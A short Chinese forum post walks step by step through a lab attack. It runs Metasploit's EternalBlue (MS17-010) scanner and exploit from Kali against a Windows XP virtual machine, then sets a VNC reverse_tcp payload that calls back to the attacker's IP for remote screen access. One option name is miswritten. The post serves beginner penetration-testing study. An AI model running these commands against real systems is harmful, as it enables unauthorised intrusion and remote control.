攻击机:kali 2020.4 靶机:windows xp32位进入kali终端后,输入msfconsole,调出MSF渗透工具 输入search Ms17_010,查找永恒之蓝漏洞利用模块 按回车运行 查看靶机ip地址 先调用嗅探模块,查看靶机是否有永恒之蓝漏洞,输入use 3 输入set RHOST 192.168.48.129,告诉kali要攻击的目标ip 输入exploit,开始嗅探 出现如下界面,说明靶机有永恒之蓝漏洞 接着,开始攻击,输入use 1调用攻击模块 输入set payload payload/windows/vncinject/reverse_tcp,设置攻击载荷 打开一个新的终端,输入ip add查看kali的ip地址 回车运行后,出现如下界面,kali的ip地址为192.168.48.134 输入set RHOST 192.168.48.129,告诉kali攻击目标 并输入set IHOST 192.168.48.134,由于是回弹机制,告诉kali把从靶机取得的信息返回到这个ip地址,就是kali输入exploit,并按回车,弹出一个窗口,如下图所示,我们已经可以远程查看靶机的屏幕 最后验证一下,在靶机命令提示符中输入net user kali窗口上也出现了此画面 渗透到此结束
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
过去几个月了,我学了逆向和编程,我突然发现我写的这篇文章是真的烂,这么简单,小儿科的东西也往论坛上发,不过算是给刚入门渗透的同学做个参考吧